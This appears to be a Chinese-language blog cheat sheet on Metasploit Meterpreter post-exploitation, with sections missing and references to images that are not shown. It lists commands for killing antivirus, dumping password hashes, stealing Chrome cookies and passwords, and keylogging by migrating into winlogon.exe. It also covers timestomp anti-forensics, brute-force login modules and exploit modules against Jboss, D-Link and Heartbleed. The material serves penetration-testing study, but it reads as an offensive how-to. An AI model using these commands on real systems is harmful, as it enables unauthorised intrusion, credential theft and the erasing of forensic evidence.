Meterpreter重要命令与使用

Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力，本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。

0x01.系统命令

1.基本系统命令

sessions    #sessions -h 查看帮助
sessions -i <ID值>    #进入回话  -k杀死会话
background    #将当前会话至于后台
run         #执行已有模块或脚本，输入run后按两下tab键，列出已有的脚本
info <...>      #查看已有模块信息
grtuid         #查看权限
getpid          #查看当前进程的pid
sysinfo         #查看目标机系统信息
ps              #查看当前活跃进程
idletime        #查看目标机闲置时间，显示目标机器截止到当前无操作命令的时间
reboot/shutdown          #重启/关机
shell            #进入目标机cmd shell（如果出错，考虑是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理员用户进程中再尝试）
load/use         #加载模块

  
  

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[] Killing Antivirus services on the target...
[] Killing off sh.exe...
[*] Killing off sh.exe...

0x15.扫描脚本

扫描的脚本位于：

/usr/share/metasploit-framework/modules/auxiliary/scanner/

 
 

 
 

扫描的脚本较多，仅列几个代表：

use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/jboss_vulnscan
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/oracle/oracle_login

 
 

 
 

0X16.各种脚本

为获取远程机器上的信息，在meterpreter中还有很多脚本可用，做更大的渗透测试。

使用run <scriptname>来使用meterpreter模块中的脚本命令。

(1) run packetrecorder

查看目标系统的所有网络流量，并且进行数据包记录，-i 1指定记录数据包的网卡。

从下图中运行之后返回的信息中可以到我们需要查看的目标系统的网络流量信息将被存储的路径，可以到下面路径中直接查看。

(2) run get_local_subnets

得到本地子网网段

(3) run getcountermeasure

显示HIPS和AV进程的列表，显示远程机器的防火墙规则，列出DEP和UAC策略

(4) run scraper

从目标主机获得所有网络共享等信息(密码等)。

并且获得的这些所有这些信息都存储在/root/.msf4/logs/scripts/scraper directory目录下。使用ls命令查看存储的这些文件。

(5)run killav

命令终止Av进程，可以很快的清除我们的路径和有效渗透测试的记录

但是这个脚本,不能绝对得逃避杀毒软件，但是如果成功了对被攻击者会是一个严重的打击，对他造成很大的困扰。

使用了 “run killav”命令后xp会终止Av进程然后弹出窗口：

(6) run hashdump

获得密码哈希值

运行这个脚本和在meterpreter下直接运行hashdump结果差不多。

(7) run dumplinks

Link文件包含时间戳，文件位置，共享名，卷序列号，等。脚本会在用户目录和office目录中收集lnk文件

调用post/windows/gather/dumplinks获取目标主机上最近访问过的文档、链接信息

命令：run post/windows/gather/dumplinks

效果如下图：

(8) duplicate

再次产生payload，注入到其他进程或打开新进程并注入其中

(9) run enum_chrome

获取chrome中的信息，包括cooikie，历史纪录，书签,登录密码等。同理：enum_firefox

(10) run get_env

获取所有用户的环境变量

(11) run getgui

可以很方便的开启远程桌面服务，添加用户，端口转发功能

(12) run gettelnet

同之前开启终端桌面服务的脚本，这个是用来开启telnet的

(13)run hostsedit

操作hosts文件

(14)run win32-sshserver

安装openssh服务

(15) run winenum

会自动运行多种命令，将命令结果保存到本地

@绑定进程@

Meterpreter既可以单独运行，也可以与其他进程进行绑定。因此，我们可以让Meterpreter与类似explorer.exe这样的进程进行绑定，并以此来实现持久化。

在下面的例子中，我们会将Meterpreter跟winlogon.exe绑定，并在登录进程中捕获键盘记录。

首先，我们需要使用“ps”命令查看目标设备中运行的进程：

接下来，使用“getpid”找出需要绑定的进程，接下来，使用migrate命令+pid来绑定进程。

绑定完成之后，我们就可以开始捕获键盘数据了：

接下来，我们可以选择导出键盘记录，或者使用命令“enum_logged_on_users”来检查用户是否成功登录：

等待片刻之后，使用keyscan_dump命令导出记录信息:

捕捉到的用户密码为trustno1。

基于MACE时间的反电子取证

**小插曲：**文件四属性（MACE）

只要有人访问文件并读取其内容。文件的MACE属性立即发生变化！这对取证非常的有好处。

MACE 是：Modified-Accessed-Created-Entry 这四个单词的缩写！

Modified：修改时间

Accessed：访问时间

Created：创建时间

Entry Modified： 条目修改时间

timestomp -v secist.txt #查看当前目标文件 MACE 时间。

timestomp c:/a.doc -c “10/27/2015 14:22:11” #修改文件的创建时间，例如修改文件的创建时间（反取证调查）

timestomp -f c:\AVScanner.ini secist.txt （将模板文件MACE时间，复制给当前secist.txt文件）

之后就是愉快的内网扫描了!haha!

一些常用的破解模块(就是各种…_login)

auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login
auxiliary/scanner/ftp/anonymous

 
 

 
 
13

一些好用的模块

auxiliary/admin/realvnc_41_bypass  (Bypass VNCV4网上也有利用工具)
auxiliary/admin/cisco/cisco_secure_acs_bypass （cisco Bypass 版本5.1或者未打补丁5.2版洞略老）
auxiliary/admin/http/jboss_deploymentfilerepository （内网遇到Jboss最爱:)）
auxiliary/admin/http/dlink_dir_300_600_exec_noauth (Dlink 命令执行:)
auxiliary/admin/mssql/mssql_exec （用爆破得到的sa弱口令进行执行命令没回显:(）
auxiliary/scanner/http/jboss_vulnscan (Jboss 内网渗透的好朋友)
auxiliary/admin/mysql/mysql_sql (用爆破得到的弱口令执行sql语句:)
auxiliary/admin/oracle/post_exploitation/win32exec （爆破得到Oracle弱口令来Win32命令执行）
auxiliary/admin/postgres/postgres_sql (爆破得到的postgres用户来执行sql语句)
auxiliary/scanner/rsync/modules_list  （Rsync）
auxiliary/scanner/misc/redis_server  (Redis)
auxiliary/scanner/ssl/openssl_heartbleed (心脏滴血)
auxiliary/scanner/mongodb/mongodb_login (Mongodb)
auxiliary/scanner/elasticsearch/indices_enum (elasticsearch)
auxiliary/scanner/http/axis_local_file_include (axis本地文件包含)
auxiliary/scanner/http/http_put (http Put)
auxiliary/scanner/http/gitlab_user_enum (获取内网gitlab用户)
auxiliary/scanner/http/jenkins_enum (获取内网jenkins用户)
auxiliary/scanner/http/svn_scanner （svn Hunter :)）
auxiliary/scanner/http/tomcat_mgr_login (Tomcat 爆破)
auxiliary/scanner/http/zabbix_login （Zabbix :)）

 
 

 
 

本节所涉及的windows系统程序：

• svchost.exe是微软Windows操作系统中的系统文件，微软官方对它的解释是：svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。这个程序对系统的正常运行是非常重要，而且是不能被结束的。许多服务通过注入到该程序中启动，所以会有多个该文件的进程。
• explorer.exe是Windows程序管理器或者文件资源管理器，它用于管理Windows图形壳，包括桌面和文件管理，删除该程序会导致Windows图形界面无法使用。explorer.exe也有可能是w32.Codered等病毒。该病毒通过email邮件传播，当打开病毒发送的附件时，即被感染，会在受害者机器上建立SMTP服务，允许攻击者访问你的计算机、窃取密码和个人数据。
• winlogon.exe是Windows NT 用户登陆程序，用于管理用户登录和退出。该进程的正常路径应是C:\Windows\System32，且是以 SYSTEM 用户运行，若不是以上路径且不以 SYSTEM 用户运行，则可能是 W32.Netsky.D@mm 蠕虫病毒，该病毒通过 EMail 邮件传播，当你打开病毒发送的附件时，即会被感染。